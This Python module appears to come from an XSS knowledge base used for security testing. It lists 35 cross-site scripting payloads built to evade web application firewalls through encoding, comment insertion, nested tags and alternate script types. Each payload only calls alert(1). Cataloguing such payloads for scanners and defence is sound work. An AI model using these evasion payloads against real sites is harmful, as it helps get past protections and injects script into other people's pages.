#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

WAF Bypass Core Payloads - Part 3
"""

from typing import Dict

from ..models import PayloadEntry


WAF_BYPASS_CORE_PAYLOADS_PART3: Dict[str, PayloadEntry] = {
    "waf_bypass_069": PayloadEntry(
        payload="<script>[].map(alert,1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_070": PayloadEntry(
        payload="<script>[1].find(alert)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_071": PayloadEntry(
        payload="<script>[1].filter(alert)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_072": PayloadEntry(
        payload="<script>[1].reduce(alert)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_073": PayloadEntry(
        payload="<script>[1].forEach(alert)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_074": PayloadEntry(
        payload="<scri%70t>alert(1)</scri%70t>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_075": PayloadEntry(
        payload="<scri\\x70t>alert(1)</scri\\x70t>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_076": PayloadEntry(
        payload="<scri\\u0070t>alert(1)</scri\\u0070t>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_077": PayloadEntry(
        payload="<script>alert&lpar;1&rpar;</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_078": PayloadEntry(
        payload="<script>alert&num;40&semi;1&num;41&semi;</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_079": PayloadEntry(
        payload='<style>@import"\\6A \\61 \\76 \\61 \\73 \\63 \\72 \\69 \\70 \\74 \\3A alert(1)"</style>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_080": PayloadEntry(
        payload="<img src=x onerror=setTimeout(alert,1,1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_081": PayloadEntry(
        payload="<img src=x onerror=setInterval(alert,1,1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_082": PayloadEntry(
        payload="<img src=x onerror=requestAnimationFrame(alert.bind(null,1))>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_083": PayloadEntry(
        payload='<iframe src="javascript:&quot;alert(1)&quot;">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_084": PayloadEntry(
        payload='<iframe src="javascript:&apos;alert(1)&apos;">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_085": PayloadEntry(
        payload='<iframe src="javascript:\\u0027alert(1)\\u0027">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_086": PayloadEntry(
        payload='<script>document.createElement("script").innerHTML="alert(1)"</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_087": PayloadEntry(
        payload='<script>document.implementation.createHTMLDocument().write("<script>alert(1)</script>")</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_088": PayloadEntry(
        payload="<script>/**/alert/**/(/*(*/1/*)*//*)*/)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_089": PayloadEntry(
        payload="<script>/**/alert/**/(/*(*/String.fromCharCode(49)/*)*//*)*/)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_090": PayloadEntry(
        payload="<script>/*!alert(1)*/</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_091": PayloadEntry(
        payload="<script>/*! alert(1) */</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_092": PayloadEntry(
        payload="<script>//alert(1)\\n</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_093": PayloadEntry(
        payload="<script>#alert(1)\\n</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_094": PayloadEntry(
        payload="<script>ale\\\\\\nrt(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_095": PayloadEntry(
        payload="<script>ale\\\\\\rrt(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_096": PayloadEntry(
        payload="<script>ale\\\\\\r\\nrt(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_097": PayloadEntry(
        payload="<scr<script>ipt>alert(1)</scr</script>ipt>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_098": PayloadEntry(
        payload="<scr<script>ipt>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_099": PayloadEntry(
        payload="<<script>script>alert(1)<</script>/script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_100": PayloadEntry(
        payload='<script type="text/javascript">alert(1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_101": PayloadEntry(
        payload='<script type="application/javascript">alert(1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_102": PayloadEntry(
        payload='<script type="text/ecmascript">alert(1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_103": PayloadEntry(
        payload='<script type="application/ecmascript">alert(1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
}
